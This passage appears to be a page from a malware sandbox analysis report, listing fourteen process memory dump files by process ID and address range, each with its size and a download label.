memory/2752-24191-0x00000000003A0000-0x00000000008FA000-memory.dmp

Filesize
5.4MB

Download
memory/2940-12119-0x0000000002270000-0x00000000022C6000-memory.dmp

Filesize
344KB

Download
memory/2940-12118-0x0000000000AB0000-0x0000000000AB8000-memory.dmp

Filesize
32KB

Download
memory/2940-9890-0x0000000000570000-0x000000000061C000-memory.dmp

Filesize
688KB

Download
memory/2940-9891-0x00000000023E0000-0x00000000024C8000-memory.dmp

Filesize
928KB

Download
memory/3056-21954-0x0000000000400000-0x00000000004AC000-memory.dmp

Filesize
688KB

Download
memory/3332-17059-0x0000000000AF0000-0x0000000000E50000-memory.dmp

Filesize
3.4MB

Download
memory/4320-24192-0x0000000000400000-0x0000000000760000-memory.dmp

Filesize
3.4MB

Download
memory/4320-29124-0x0000000002820000-0x0000000002874000-memory.dmp

Filesize
336KB

Download
memory/4616-36229-0x0000000000240000-0x000000000079A000-memory.dmp

Filesize
5.4MB

Download
memory/6476-41150-0x0000000001240000-0x0000000001248000-memory.dmp

Filesize
32KB

Download
memory/7508-12127-0x000000001A0D0000-0x000000001A3B2000-memory.dmp

Filesize
2.9MB

Download
memory/7508-12128-0x0000000001300000-0x0000000001308000-memory.dmp

Filesize
32KB

Download
memory/7644-12140-0x00000000000A0000-0x00000000005FA000-memory.dmp

Filesize
5.4MB

Download